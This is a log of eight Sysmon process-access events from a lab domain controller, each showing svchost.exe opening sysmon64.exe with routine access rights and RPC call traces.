{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.336\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.336","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.337\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.337","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.337\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.337","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.337\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.337","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.337\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.337","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.338\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.338","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.338\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.338","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
